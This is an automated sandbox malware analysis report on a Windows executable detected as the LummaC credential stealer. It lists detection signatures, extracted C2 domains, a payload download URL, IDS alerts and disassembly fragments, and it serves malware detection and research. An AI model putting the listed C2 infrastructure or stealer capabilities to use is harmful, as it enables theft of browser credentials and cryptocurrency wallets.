Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe

Overview

General Information

Sample name:#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
renamed because original name is a hash value
Original sample name:_patched.exe
Analysis ID:1664105
MD5:cb0642ac717f55a8aac26b51fa96151d
SHA1:fd2fdcf2d3f048fe90bed0217f4318c7c33a8446
SHA256:04248506f0dca37b8eddfeeae66c70dca3009a97247c3e5170db66b53ddf45fa
Tags:de-pumpedexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
{"C2 url": ["bxattlepath.digital/ogda", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000003.1476540257.00000000035DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        Process Memory Space: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe PID: 6168JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe PID: 6168JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-13T17:03:08.964479+020020283713Unknown Traffic192.168.2.44973089.169.54.153443TCP
            2025-04-13T17:03:30.611373+020020283713Unknown Traffic192.168.2.449721172.67.157.7443TCP
            2025-04-13T17:03:33.177726+020020283713Unknown Traffic192.168.2.449723172.67.157.7443TCP
            2025-04-13T17:03:34.437276+020020283713Unknown Traffic192.168.2.449724172.67.157.7443TCP
            2025-04-13T17:03:35.957124+020020283713Unknown Traffic192.168.2.449725172.67.157.7443TCP
            2025-04-13T17:03:40.731669+020020283713Unknown Traffic192.168.2.449726172.67.157.7443TCP
            2025-04-13T17:03:41.664933+020020283713Unknown Traffic192.168.2.449727172.67.157.7443TCP
            2025-04-13T17:03:42.859474+020020283713Unknown Traffic192.168.2.449728172.67.157.7443TCP
            2025-04-13T17:03:44.915880+020020283713Unknown Traffic192.168.2.449729172.67.157.7443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: jawdedmirror.run/ewqdAvira URL Cloud: Label: malware
            Source: nighetwhisper.top/lekdAvira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop:443/shark.binAvira URL Cloud: Label: malware
            Source: owlflright.digital/qopyAvira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop/lAvira URL Cloud: Label: malware
            Source: https://h1.mockupeastcoast.shop/shark.binOAvira URL Cloud: Label: malware
            Source: lonfgshadow.live/xawiAvira URL Cloud: Label: malware
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["bxattlepath.digital/ogda", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeVirustotal: Detection: 15%Perma Link
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeReversingLabs: Detection: 19%
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: bxattlepath.digital/ogda
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: jawdedmirror.run/ewqd
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: changeaie.top/geps
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: lonfgshadow.live/xawi
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: liftally.top/xasj
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: nighetwhisper.top/lekd
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: salaccgfa.top/gsooz
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: zestmodp.top/zeda
            Source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmpString decryptor: owlflright.digital/qopy
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3E4C8 CryptUnprotectData,0_3_00C3E4C8
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3A7C9 CryptUnprotectData,0_3_00C3A7C9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3CD6E CryptUnprotectData,0_3_00C3CD6E
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49729 version: TLS 1.2
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\Programming\mpeg4\mp4v2-1.9.1\vstudio9.0\Release Static\mp4info.pdb source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax-5F27C3FAh]0_3_00C56040
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [ecx], dx0_3_00C6F060
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_3_00C4E2A0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 979C980Eh0_3_00C6F2B0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 82C925F5h0_3_00C3E39A
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+698BEB24h]0_3_00C67580
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-486B9000h]0_3_00C6F610
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1A806F82h]0_3_00C2D9F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9A54833Ch0_3_00C32A63
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-00000082h]0_3_00C3FCB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], D397AED6h0_3_00C3FCB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+1Ch]0_3_00C3FCB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_3_00C6DDB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-486B9000h]0_3_00C6DED0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax-5F27C3FAh]0_3_00C560DB
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E3671E81h0_3_00C3B06D
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-38h]0_3_00C4D1C1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esi+20h], 8B8AB510h0_3_00C551D7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-0D1766BEh]0_3_00C551D7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [edx], al0_3_00C551D7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-0D1766DEh]0_3_00C5D140
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+371BB676h]0_3_00C3215D
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [edi], cl0_3_00C542EB
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-51F3EF56h]0_3_00C2C2F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ebx], cl0_3_00C2C2F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+10h]0_3_00C2B250
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_3_00C2B200
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2FECA702h]0_3_00C31211
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+34h]0_3_00C51210
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp word ptr [eax+edx], 0000h0_3_00C3D36F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov ebp, edi0_3_00C63300
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then dec ecx0_3_00C63300
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [edx], al0_3_00C544C6
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then jmp dword ptr [00C75158h]0_3_00C4F4BF
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [edx], al0_3_00C5445D
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [edx], al0_3_00C54477
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-00AE2DC2h]0_3_00C31405
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then lea ecx, dword ptr [ebx+ebx]0_3_00C22410
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esi+20h], 8B8AB510h0_3_00C5554B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-0D1766BEh]0_3_00C5554B
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, word ptr [eax]0_3_00C30563
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx-42h]0_3_00C42517
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esi+20h], 8B8AB510h0_3_00C55511
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-0D1766BEh]0_3_00C55511
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ecx], al0_3_00C41535
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax-000000FCh]0_3_00C41535
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax-000000FCh]0_3_00C41535
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esi+20h], 8B8AB510h0_3_00C55533
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-0D1766BEh]0_3_00C55533
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov ebp, eax0_3_00C286D0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [eax], cx0_3_00C47690
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [eax], cx0_3_00C50676
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-486B9000h]0_3_00C6F790
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+5Eh]0_3_00C32798
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ebx], al0_3_00C5476C
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ebx], al0_3_00C54769
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_3_00C5F8F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_3_00C2C8A0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [eax], cx0_3_00C43850
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-486B8FF4h]0_3_00C6B800
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0696C7F3h]0_3_00C3C9C7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then add eax, 02h0_3_00C2A940
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_3_00C42940
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-3A24E12Ah]0_3_00C4C949
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then lea eax, dword ptr [ebp+04h]0_3_00C50909
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp word ptr [edx+eax+02h], 0000h0_3_00C45A00
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-7E383E0Eh]0_3_00C45A00
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+34h]0_3_00C4FA35
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000000C0h]0_3_00C32BD9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx eax, byte ptr [esi+ebx+3257A9F6h]0_3_00C41BAB
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 5675B2C2h0_3_00C67B50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ebx], cl0_3_00C53B17
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ecx], bl0_3_00C55CC9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+27353650h]0_3_00C65C83
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_3_00C21C50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ecx], bl0_3_00C55C60
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov byte ptr [ecx], bl0_3_00C55C11
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4B225AD0h]0_3_00C50C13
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [eax], cx0_3_00C50C13
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then dec ebp0_3_00C6DC20
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esp+10h], ecx0_3_00C6BC30
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]0_3_00C4CEFD
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]0_3_00C21E80
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_3_00C29F40
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_3_00C29F40
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_3_00C46F50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov dword ptr [esp+0Ch], ecx0_3_00C46F50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_3_00C51F50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 4x nop then mov word ptr [edx], cx0_3_00C41F6C

            Networking

            barindex
            Source: Malware configuration extractorURLs: bxattlepath.digital/ogda
            Source: Malware configuration extractorURLs: jawdedmirror.run/ewqd
            Source: Malware configuration extractorURLs: changeaie.top/geps
            Source: Malware configuration extractorURLs: lonfgshadow.live/xawi
            Source: Malware configuration extractorURLs: liftally.top/xasj
            Source: Malware configuration extractorURLs: nighetwhisper.top/lekd
            Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
